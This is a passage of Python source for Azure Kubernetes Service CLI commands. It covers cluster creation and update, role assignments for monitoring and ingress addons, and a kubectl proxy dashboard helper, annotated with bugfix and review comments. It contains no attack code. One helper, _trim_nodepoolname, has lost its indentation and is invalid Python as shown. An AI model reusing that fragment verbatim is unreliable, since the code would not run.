        wait_then_open_async(dashboardURL)
    try:
        try:
            subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
                                     listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
        except subprocess.CalledProcessError as err:
            # BUGFIX: the original tested 'err.output.find(...)' directly, which
            # is truthy for -1 (substring absent) and falsy when the message
            # sits at index 0 — the fallback fired on exactly the wrong errors.
            # Use membership so we only retry without --address when kubectl
            # genuinely lacks the flag (it was added in kubectl v1.13).
            if b'unknown flag: --address' in err.output:
                if listen_address != '127.0.0.1':
                    logger.warning('"--address" is only supported in kubectl v1.13 and later.')
                    logger.warning('The "--listen-address" argument will be ignored.')
                subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
    except KeyboardInterrupt:
        # Let command processing finish gracefully after the user presses [Ctrl+C]
        pass
    finally:
        if in_cloud_console():
            # BUGFIX: close the port that was actually opened instead of the
            # hard-coded default '8001'.
            requests.post('http://localhost:8888/closeport/{0}'.format(listen_port))
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
    """Grant 'Monitoring Metrics Publisher' on the cluster to the identity
    backing the monitoring addon.

    Prefers the cluster's service principal when one exists; otherwise
    falls back to the omsagent addon's managed identity. Failures only log
    warnings — they never abort the calling operation.
    """
    service_principal_msi_id = None
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id != 'msi'
    ):
        logger.info('valid service principal exists, using it')
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            (CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
            (hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
            (hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
    ):
        logger.info('omsagent MSI exists, using it')
        service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
        is_service_principal = False
    if service_principal_msi_id is not None:
        if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
                                    service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
            logger.warning('Could not create a role assignment for Monitoring addon. '
                           'Are you an Owner on this subscription?')
    else:
        # BUGFIX: the two adjacent string literals were missing a space
        # between "role" and "assignment" in the logged message.
        logger.warning('Could not find service principal or user assigned MSI for role '
                       'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
    """Grant the ingress-appgw addon identity the role assignments it needs.

    Depending on the addon config: Contributor on the referenced application
    gateway's resource group, Network Contributor on a user-provided subnet,
    or Contributor on the node vnet when the addon will carve a subnet from
    a CIDR. Failures only log warnings — they never abort the operation.
    """
    service_principal_msi_id = None
    # Check if service principal exists, if it does, assign permissions to service principal
    # Else, provide permissions to MSI
    if (
            hasattr(result, 'service_principal_profile') and
            hasattr(result.service_principal_profile, 'client_id') and
            result.service_principal_profile.client_id != 'msi'
    ):
        service_principal_msi_id = result.service_principal_profile.client_id
        is_service_principal = True
    elif (
            (hasattr(result, 'addon_profiles')) and
            (CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
            (hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
            (hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
    ):
        service_principal_msi_id = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
        is_service_principal = False
    if service_principal_msi_id is not None:
        config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
        from msrestazure.tools import parse_resource_id, resource_id
        if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
            # existing application gateway: Contributor on its resource group
            appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
            parsed_appgw_id = parse_resource_id(appgw_id)
            appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
                                         resource_group=parsed_appgw_id["resource_group"])
            if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                        service_principal_msi_id, is_service_principal, scope=appgw_group_id):
                logger.warning('Could not create a role assignment for application gateway: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
        if CONST_INGRESS_APPGW_SUBNET_ID in config:
            # user-provided subnet: Network Contributor on the subnet itself
            subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
            if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                        service_principal_msi_id, is_service_principal, scope=subnet_id):
                logger.warning('Could not create a role assignment for subnet: %s '
                               'specified in %s addon. '
                               'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
        if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
            # addon will create a subnet from a CIDR: Contributor on the node vnet
            if result.agent_pool_profiles[0].vnet_subnet_id is not None:
                parsed_subnet_vnet_id = parse_resource_id(result.agent_pool_profiles[0].vnet_subnet_id)
                vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
                                      resource_group=parsed_subnet_vnet_id["resource_group"],
                                      namespace="Microsoft.Network",
                                      type="virtualNetworks",
                                      name=parsed_subnet_vnet_id["name"])
                if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
                                            service_principal_msi_id, is_service_principal, scope=vnet_id):
                    logger.warning('Could not create a role assignment for virtual network: %s '
                                   'specified in %s addon. '
                                   'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def aks_create(cmd,   # pylint: disable=too-many-locals,too-many-statements,too-many-branches
               client,
               resource_group_name,
               name,
               ssh_key_value,
               dns_name_prefix=None,
               location=None,
               admin_username="azureuser",
               windows_admin_username=None,
               windows_admin_password=None,
               enable_ahub=False,
               kubernetes_version='',
               node_vm_size="Standard_DS2_v2",
               node_osdisk_type=None,
               node_osdisk_size=0,
               node_osdisk_diskencryptionset_id=None,
               node_count=3,
               nodepool_name="nodepool1",
               nodepool_tags=None,
               nodepool_labels=None,
               service_principal=None, client_secret=None,
               no_ssh_key=False,
               disable_rbac=None,
               enable_rbac=None,
               enable_vmss=None,
               vm_set_type=None,
               skip_subnet_role_assignment=False,
               enable_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               network_plugin=None,
               network_policy=None,
               pod_cidr=None,
               service_cidr=None,
               dns_service_ip=None,
               docker_bridge_address=None,
               load_balancer_sku=None,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               outbound_type=None,
               enable_addons=None,
               workspace_resource_id=None,
               min_count=None,
               max_count=None,
               vnet_subnet_id=None,
               pod_subnet_id=None,
               ppg=None,
               max_pods=0,
               aad_client_app_id=None,
               aad_server_app_id=None,
               aad_server_app_secret=None,
               aad_tenant_id=None,
               tags=None,
               node_zones=None,
               enable_node_public_ip=False,
               generate_ssh_keys=False,  # pylint: disable=unused-argument
               enable_pod_security_policy=False,
               node_resource_group=None,
               uptime_sla=False,
               attach_acr=None,
               enable_private_cluster=False,
               private_dns_zone=None,
               enable_managed_identity=True,
               api_server_authorized_ip_ranges=None,
               aks_custom_headers=None,
               appgw_name=None,
               appgw_subnet_prefix=None,
               appgw_subnet_cidr=None,
               appgw_id=None,
               appgw_subnet_id=None,
               appgw_watch_namespace=None,
               enable_aad=False,
               enable_azure_rbac=False,
               aad_admin_group_object_ids=None,
               aci_subnet_name=None,
               enable_sgxquotehelper=False,
               kubelet_config=None,
               linux_os_config=None,
               assign_identity=None,
               auto_upgrade_channel=None,
               enable_pod_identity=False,
               enable_encryption_at_host=False,
               no_wait=False,
               yes=False):
    """Create a managed AKS cluster.

    Builds the ManagedCluster request piece by piece — agent pool, SSH/Linux
    profile, optional Windows profile, identity vs. service principal,
    network profile, addon profiles, AAD, API-server access — then submits
    it, retrying on AAD service-principal propagation delays. Returns the
    created cluster (or the poller when --no-wait is used), or None when
    the user declines the system-assigned-identity subnet prompt.
    """
    # Validate the SSH key up front unless the caller opted out with --no-ssh-key.
    if not no_ssh_key:
        try:
            if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
                raise ValueError()
        except (TypeError, ValueError):
            shortened_key = truncate_text(ssh_key_value)
            raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
    subscription_id = get_subscription_id(cmd.cli_ctx)
    if not dns_name_prefix:
        dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
    # default the cluster location to the resource group's location
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    if location is None:
        location = rg_location
    # Flag to be removed, kept for back-compatibility only. Remove the below section
    # when we deprecate the enable-vmss flag
    if enable_vmss:
        if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
            raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
                           format(vm_set_type))
        vm_set_type = "VirtualMachineScaleSets"
    vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
    load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
    if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
        raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
    # The single system-mode agent pool every new cluster starts with.
    agent_pool_profile = ManagedClusterAgentPoolProfile(
        name=_trim_nodepoolname(nodepool_name),  # Must be 12 chars or less before ACS RP adds to it
        tags=nodepool_tags,
        node_labels=nodepool_labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type="Linux",
        mode="System",
        vnet_subnet_id=vnet_subnet_id,
        pod_subnet_id=pod_subnet_id,
        proximity_placement_group_id=ppg,
        availability_zones=node_zones,
        enable_node_public_ip=enable_node_public_ip,
        enable_encryption_at_host=enable_encryption_at_host,
        max_pods=int(max_pods) if max_pods else None,
        type=vm_set_type
    )
    if node_osdisk_size:
        agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
    if node_osdisk_type:
        agent_pool_profile.os_disk_type = node_osdisk_type
    _check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
    if kubelet_config:
        agent_pool_profile.kubelet_config = _get_kubelet_config(kubelet_config)
    if linux_os_config:
        agent_pool_profile.linux_os_config = _get_linux_os_config(linux_os_config)
    linux_profile = None
    # LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
    if not no_ssh_key:
        ssh_config = ContainerServiceSshConfiguration(
            public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
        linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
    windows_profile = None
    if windows_admin_username:
        # prompt for the password when not supplied (interactive mode only)
        if windows_admin_password is None:
            try:
                windows_admin_password = prompt_pass(msg='windows-admin-password: ', confirm=True)
            except NoTTYException:
                raise CLIError('Please specify both username and password in non-interactive mode.')
        windows_license_type = None
        if enable_ahub:
            # Azure Hybrid Use Benefit licensing for Windows nodes
            windows_license_type = 'Windows_Server'
        windows_profile = ManagedClusterWindowsProfile(
            admin_username=windows_admin_username,
            admin_password=windows_admin_password,
            license_type=windows_license_type)
    service_principal_profile = None
    principal_obj = None
    # If customer explicitly provide a service principal, disable managed identity.
    if service_principal and client_secret:
        enable_managed_identity = False
    if not enable_managed_identity:
        principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
                                                      service_principal=service_principal, client_secret=client_secret,
                                                      subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
                                                      location=location, name=name)
        service_principal_profile = ManagedClusterServicePrincipalProfile(
            client_id=principal_obj.get("service_principal"),
            secret=principal_obj.get("client_secret"))
    if attach_acr:
        if enable_managed_identity:
            if no_wait:
                raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
                               '--no-wait is not allowed, please wait until the whole operation succeeds.')
            # NOTE(review): for MSI clusters the AcrPull grant presumably
            # happens after creation inside _put_managed_cluster_ensuring_permission
            # (it receives attach_acr below) — confirm against that helper.
        else:
            _ensure_aks_acr(cmd.cli_ctx,
                            client_id=service_principal_profile.client_id,
                            acr_name_or_id=attach_acr,
                            subscription_id=subscription_id)
    need_post_creation_vnet_permission_granting = False
    if (vnet_subnet_id and not skip_subnet_role_assignment and
            not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
        # if service_principal_profile is None, then this cluster is an MSI cluster,
        # and the service principal does not exist. Two cases:
        # 1. For system assigned identity, we just tell user to grant the
        # permission after the cluster is created to keep consistent with portal experience.
        # 2. For user assigned identity, we can grant needed permission to
        # user provided user assigned identity before creating managed cluster.
        if service_principal_profile is None and not assign_identity:
            msg = ('It is highly recommended to use USER assigned identity '
                   '(option --assign-identity) when you want to bring your own'
                   'subnet, which will have no latency for the role assignment to '
                   'take effect. When using SYSTEM assigned identity, '
                   'azure-cli will grant Network Contributor role to the '
                   'system assigned identity after the cluster is created, and '
                   'the role assignment will take some time to take effect, see '
                   'https://docs.microsoft.com/en-us/azure/aks/use-managed-identity, '
                   'proceed to create cluster with system assigned identity?')
            from knack.prompting import prompt_y_n
            if not yes and not prompt_y_n(msg, default="n"):
                return None
            need_post_creation_vnet_permission_granting = True
        else:
            scope = vnet_subnet_id
            identity_client_id = ""
            if assign_identity:
                identity_client_id = _get_user_assigned_identity_client_id(cmd.cli_ctx, assign_identity)
            else:
                identity_client_id = service_principal_profile.client_id
            # NOTE(review): unlike other call sites, is_service_principal is not
            # passed here and falls back to the helper's default — confirm intended.
            if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                        identity_client_id, scope=scope):
                logger.warning('Could not create a role assignment for subnet. '
                               'Are you an Owner on this subscription?')
    load_balancer_profile = create_load_balancer_profile(
        load_balancer_managed_outbound_ip_count,
        load_balancer_outbound_ips,
        load_balancer_outbound_ip_prefixes,
        load_balancer_outbound_ports,
        load_balancer_idle_timeout)
    outbound_type = _set_outbound_type(outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
    network_profile = None
    # any explicit network setting requires an explicit plugin choice
    if any([network_plugin,
            pod_cidr,
            service_cidr,
            dns_service_ip,
            docker_bridge_address,
            network_policy]):
        if not network_plugin:
            raise CLIError('Please explicitly specify the network plugin type')
        if pod_cidr and network_plugin == "azure":
            raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
        network_profile = ContainerServiceNetworkProfile(
            network_plugin=network_plugin,
            pod_cidr=pod_cidr,
            service_cidr=service_cidr,
            dns_service_ip=dns_service_ip,
            docker_bridge_cidr=docker_bridge_address,
            network_policy=network_policy,
            load_balancer_sku=load_balancer_sku.lower(),
            load_balancer_profile=load_balancer_profile,
            outbound_type=outbound_type
        )
    else:
        # no explicit settings: still pin the profile when a standard LB
        # (or LB profile / basic SKU) needs to be recorded
        if load_balancer_sku.lower() == "standard" or load_balancer_profile:
            network_profile = ContainerServiceNetworkProfile(
                network_plugin="kubenet",
                load_balancer_sku=load_balancer_sku.lower(),
                load_balancer_profile=load_balancer_profile,
                outbound_type=outbound_type,
            )
        if load_balancer_sku.lower() == "basic":
            network_profile = ContainerServiceNetworkProfile(
                load_balancer_sku=load_balancer_sku.lower(),
            )
    addon_profiles = _handle_addons_args(
        cmd,
        enable_addons,
        subscription_id,
        resource_group_name,
        {},
        workspace_resource_id,
        appgw_name,
        appgw_subnet_prefix,
        appgw_subnet_cidr,
        appgw_id,
        appgw_subnet_id,
        appgw_watch_namespace,
        enable_sgxquotehelper,
        aci_subnet_name,
        vnet_subnet_id
    )
    monitoring = False
    if CONST_MONITORING_ADDON_NAME in addon_profiles:
        monitoring = True
        _ensure_container_insights_for_monitoring(cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
    # addon is in the list and is enabled
    ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
    os_type = 'Linux'
    enable_virtual_node = False
    if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
        enable_virtual_node = True
    aad_profile = None
    if enable_aad:
        # managed AAD is mutually exclusive with the legacy client/server app flags
        if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
            raise CLIError('"--enable-aad" cannot be used together with '
                           '"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
        aad_profile = ManagedClusterAADProfile(
            managed=True,
            enable_azure_rbac=enable_azure_rbac,
            admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
            tenant_id=aad_tenant_id
        )
    else:
        if aad_admin_group_object_ids is not None:
            raise CLIError('"--admin-aad-object-id" can only be used together with "--enable-aad"')
        if enable_azure_rbac is True:
            raise CLIError('"--enable-azure-rbac" can only be used together with "--enable-aad"')
        if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
            # legacy (non-managed) AAD integration
            aad_profile = ManagedClusterAADProfile(
                client_app_id=aad_client_app_id,
                server_app_id=aad_server_app_id,
                server_app_secret=aad_server_app_secret,
                tenant_id=aad_tenant_id
            )
    # Check that both --disable-rbac and --enable-rbac weren't provided
    if all([disable_rbac, enable_rbac]):
        raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
    api_server_access_profile = None
    if api_server_authorized_ip_ranges:
        api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
    identity = None
    if not enable_managed_identity and assign_identity:
        raise CLIError('--assign-identity can only be specified when --enable-managed-identity is specified')
    if enable_managed_identity and not assign_identity:
        identity = ManagedClusterIdentity(
            type="SystemAssigned"
        )
    elif enable_managed_identity and assign_identity:
        user_assigned_identity = {
            assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
        }
        identity = ManagedClusterIdentity(
            type="UserAssigned",
            user_assigned_identities=user_assigned_identity
        )
    pod_identity_profile = None
    if enable_pod_identity:
        if not enable_managed_identity:
            raise CLIError('--enable-pod-identity can only be specified when --enable-managed-identity is specified')
        pod_identity_profile = ManagedClusterPodIdentityProfile(enabled=True)
    # RBAC defaults to enabled unless explicitly disabled
    enable_rbac = True
    if disable_rbac:
        enable_rbac = False
    auto_upgrade_profile = None
    if auto_upgrade_channel is not None:
        auto_upgrade_profile = ManagedClusterAutoUpgradeProfile(upgrade_channel=auto_upgrade_channel)
    # assemble the full ManagedCluster request payload
    mc = ManagedCluster(
        location=location, tags=tags,
        dns_prefix=dns_name_prefix,
        kubernetes_version=kubernetes_version,
        enable_rbac=enable_rbac,
        agent_pool_profiles=[agent_pool_profile],
        linux_profile=linux_profile,
        windows_profile=windows_profile,
        service_principal_profile=service_principal_profile,
        network_profile=network_profile,
        addon_profiles=addon_profiles,
        aad_profile=aad_profile,
        auto_scaler_profile=cluster_autoscaler_profile,
        enable_pod_security_policy=bool(enable_pod_security_policy),
        identity=identity,
        disk_encryption_set_id=node_osdisk_diskencryptionset_id,
        api_server_access_profile=api_server_access_profile,
        auto_upgrade_profile=auto_upgrade_profile,
        pod_identity_profile=pod_identity_profile)
    if node_resource_group:
        mc.node_resource_group = node_resource_group
    if enable_private_cluster:
        if load_balancer_sku.lower() != "standard":
            raise CLIError("Please use standard load balancer for private cluster")
        mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
            enable_private_cluster=True
        )
    if private_dns_zone:
        if not enable_private_cluster:
            raise CLIError("Invalid private dns zone for public cluster. It should always be empty for public cluster")
        mc.api_server_access_profile.private_dns_zone = private_dns_zone
    if uptime_sla:
        mc.sku = ManagedClusterSKU(
            name="Basic",
            tier="Paid"
        )
    headers = get_aks_custom_headers(aks_custom_headers)
    # Due to SPN replication latency, we do a few retries here
    max_retry = 30
    retry_exception = Exception(None)
    for _ in range(0, max_retry):
        try:
            created_cluster = _put_managed_cluster_ensuring_permission(
                cmd,
                client,
                subscription_id,
                resource_group_name,
                name,
                mc,
                monitoring,
                ingress_appgw_addon_enabled,
                enable_virtual_node,
                need_post_creation_vnet_permission_granting,
                vnet_subnet_id,
                enable_managed_identity,
                attach_acr,
                headers,
                no_wait)
            return created_cluster
        except CloudError as ex:
            retry_exception = ex
            if 'not found in Active Directory tenant' in ex.message:
                # SPN not propagated yet — wait briefly and retry
                time.sleep(3)
            else:
                raise ex
    raise retry_exception
def aks_update(cmd,     # pylint: disable=too-many-statements,too-many-branches,too-many-locals
               client,
               resource_group_name,
               name,
               enable_cluster_autoscaler=False,
               disable_cluster_autoscaler=False,
               update_cluster_autoscaler=False,
               cluster_autoscaler_profile=None,
               min_count=None, max_count=None, no_wait=False,
               load_balancer_managed_outbound_ip_count=None,
               load_balancer_outbound_ips=None,
               load_balancer_outbound_ip_prefixes=None,
               load_balancer_outbound_ports=None,
               load_balancer_idle_timeout=None,
               api_server_authorized_ip_ranges=None,
               enable_pod_security_policy=False,
               disable_pod_security_policy=False,
               attach_acr=None,
               detach_acr=None,
               uptime_sla=False,
               no_uptime_sla=False,
               enable_aad=False,
               aad_tenant_id=None,
               aad_admin_group_object_ids=None,
               enable_ahub=False,
               disable_ahub=False,
               aks_custom_headers=None,
               auto_upgrade_channel=None,
               enable_managed_identity=False,
               assign_identity=None,
               enable_pod_identity=False,
               disable_pod_identity=False,
               yes=False,
               tags=None):
    """Update settings of an existing managed Kubernetes cluster.

    Validates the flag combinations, fetches the current ManagedCluster from the
    service, mutates it in place according to the requested options, and PUTs it
    back via _put_managed_cluster_ensuring_permission.
    """
    # Derive "did the caller ask for X" booleans used both for the no-op check
    # below and for the individual update branches.
    update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
    update_acr = attach_acr is not None or detach_acr is not None
    update_pod_security = enable_pod_security_policy or disable_pod_security_policy
    update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
                                                          load_balancer_outbound_ips,
                                                          load_balancer_outbound_ip_prefixes,
                                                          load_balancer_outbound_ports,
                                                          load_balancer_idle_timeout)
    update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
    # Error out early if nothing at all was requested.
    # NOTE(review): "not update_lb_profile" appears twice in this condition
    # (harmless redundancy); also "--load-balancer-outbound-ports" /
    # "--load-balancer-idle-timeout" are accepted but not listed in the error
    # message below.
    # pylint: disable=too-many-boolean-expressions
    if not update_autoscaler and \
       cluster_autoscaler_profile is None and \
       not update_acr and \
       not update_lb_profile \
       and api_server_authorized_ip_ranges is None and \
       not update_pod_security and \
       not update_lb_profile and \
       not uptime_sla and \
       not no_uptime_sla and \
       not enable_aad and \
       not update_aad_profile and  \
       not enable_ahub and  \
       not disable_ahub and \
       not auto_upgrade_channel and \
       not enable_managed_identity and \
       not assign_identity and \
       not enable_pod_identity and \
       not disable_pod_identity and \
       not tags:
        raise CLIError('Please specify "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--cluster-autoscaler-profile" or '
                       '"--enable-pod-security-policy" or '
                       '"--disable-pod-security-policy" or '
                       '"--api-server-authorized-ip-ranges" or '
                       '"--attach-acr" or '
                       '"--detach-acr" or '
                       '"--uptime-sla" or '
                       '"--no-uptime-sla" or '
                       '"--load-balancer-managed-outbound-ip-count" or '
                       '"--load-balancer-outbound-ips" or '
                       '"--load-balancer-outbound-ip-prefixes" or '
                       '"--enable-aad" or '
                       '"--aad-tenant-id" or '
                       '"--aad-admin-group-object-ids" or '
                       '"--enable-ahub" or '
                       '"--disable-ahub" or '
                       '"--enable-managed-identity" or '
                       '"--enable-pod-identity" or '
                       '"--disable-pod-identity" or '
                       '"--auto-upgrade-channel" or '
                       '"--tags"')

    instance = client.get(resource_group_name, name)

    # Cluster-level autoscaler flags only make sense for single-pool clusters;
    # multi-pool clusters must use "az aks nodepool".
    if update_autoscaler and len(instance.agent_pool_profiles) > 1:
        raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
                       'to update per node pool auto scaler settings')

    if min_count is None or max_count is None:
        if enable_cluster_autoscaler or update_cluster_autoscaler:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
                           '--update-cluster-autoscaler set.')

    if min_count is not None and max_count is not None:
        if int(min_count) > int(max_count):
            raise CLIError('value of min-count should be less than or equal to value of max-count.')

    if enable_cluster_autoscaler:
        if instance.agent_pool_profiles[0].enable_auto_scaling:
            # Already enabled: warn and bail out without issuing a PUT.
            logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
                           'Please run "az aks update --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.agent_pool_profiles[0].min_count = int(min_count)
        instance.agent_pool_profiles[0].max_count = int(max_count)
        instance.agent_pool_profiles[0].enable_auto_scaling = True

    if update_cluster_autoscaler:
        if not instance.agent_pool_profiles[0].enable_auto_scaling:
            raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
                           'Run "az aks update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.agent_pool_profiles[0].min_count = int(min_count)
        instance.agent_pool_profiles[0].max_count = int(max_count)

    if disable_cluster_autoscaler:
        if not instance.agent_pool_profiles[0].enable_auto_scaling:
            logger.warning('Cluster autoscaler is already disabled for this managed cluster.')
            return None
        instance.agent_pool_profiles[0].enable_auto_scaling = False
        instance.agent_pool_profiles[0].min_count = None
        instance.agent_pool_profiles[0].max_count = None

    # if intention is to clear profile
    if cluster_autoscaler_profile == {}:
        instance.auto_scaler_profile = {}
    # else profile is provided, update instance profile if it exists
    elif cluster_autoscaler_profile:
        # Merge CLI-style "key-name" keys into the SDK model's snake_case dict.
        instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
                                                    dict((key.replace("-", "_"), value)
                                                         for (key, value) in cluster_autoscaler_profile.items())) \
            if instance.auto_scaler_profile else cluster_autoscaler_profile

    if enable_pod_security_policy and disable_pod_security_policy:
        raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
                       'at the same time.')

    if enable_pod_security_policy:
        instance.enable_pod_security_policy = True

    if disable_pod_security_policy:
        instance.enable_pod_security_policy = False

    if update_lb_profile:
        instance.network_profile.load_balancer_profile = update_load_balancer_profile(
            load_balancer_managed_outbound_ip_count,
            load_balancer_outbound_ips,
            load_balancer_outbound_ip_prefixes,
            load_balancer_outbound_ports,
            load_balancer_idle_timeout,
            instance.network_profile.load_balancer_profile)

    if attach_acr and detach_acr:
        raise CLIError('Cannot specify "--attach-acr" and "--detach-acr" at the same time.')

    if uptime_sla and no_uptime_sla:
        raise CLIError('Cannot specify "--uptime-sla" and "--no-uptime-sla" at the same time.')

    if uptime_sla:
        instance.sku = ManagedClusterSKU(
            name="Basic",
            tier="Paid"
        )

    if no_uptime_sla:
        instance.sku = ManagedClusterSKU(
            name="Basic",
            tier="Free"
        )

    subscription_id = get_subscription_id(cmd.cli_ctx)
    client_id = ""
    if _is_msi_cluster(instance):
        # MSI clusters grant/revoke ACR pull via the kubelet identity, not an SP.
        if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
            raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
                           'Please do not set --attach-acr or --detach-acr. '
                           'You can manually grant or revoke permission to the identity named '
                           '<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
        client_id = instance.identity_profile["kubeletidentity"].client_id
    else:
        client_id = instance.service_principal_profile.client_id
    if not client_id:
        raise CLIError('Cannot get the AKS cluster\'s service principal.')

    if attach_acr:
        _ensure_aks_acr(cmd.cli_ctx,
                        client_id=client_id,
                        acr_name_or_id=attach_acr,
                        subscription_id=subscription_id)

    if detach_acr:
        _ensure_aks_acr(cmd.cli_ctx,
                        client_id=client_id,
                        acr_name_or_id=detach_acr,
                        subscription_id=subscription_id,
                        detach=True)

    # empty string is valid as it disables ip whitelisting
    if api_server_authorized_ip_ranges is not None:
        instance.api_server_access_profile = \
            _populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)

    if enable_aad:
        if instance.aad_profile is not None and instance.aad_profile.managed:
            raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled')
        instance.aad_profile = ManagedClusterAADProfile(
            managed=True
        )

    if update_aad_profile:
        if instance.aad_profile is None or not instance.aad_profile.managed:
            raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
                           ' if managed AAD is not enabled')
        if aad_tenant_id is not None:
            instance.aad_profile.tenant_id = aad_tenant_id
        if aad_admin_group_object_ids is not None:
            instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)

    if enable_ahub and disable_ahub:
        raise CLIError('Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')

    # Azure Hybrid User Benefits is toggled via the Windows license type.
    if enable_ahub:
        instance.windows_profile.license_type = 'Windows_Server'

    if disable_ahub:
        instance.windows_profile.license_type = 'None'

    # NOTE(review): this creates an (empty) auto-upgrade profile even when
    # --auto-upgrade-channel was not passed — presumably harmless on the
    # service side, but worth confirming.
    if instance.auto_upgrade_profile is None:
        instance.auto_upgrade_profile = ManagedClusterAutoUpgradeProfile()

    if auto_upgrade_channel is not None:
        instance.auto_upgrade_profile.upgrade_channel = auto_upgrade_channel

    if not enable_managed_identity and assign_identity:
        raise CLIError('--assign-identity can only be specified when --enable-managed-identity is specified')

    current_identity_type = "spn"
    if instance.identity is not None:
        current_identity_type = instance.identity.type.casefold()

    goal_identity_type = current_identity_type
    if enable_managed_identity:
        if not assign_identity:
            goal_identity_type = "systemassigned"
        else:
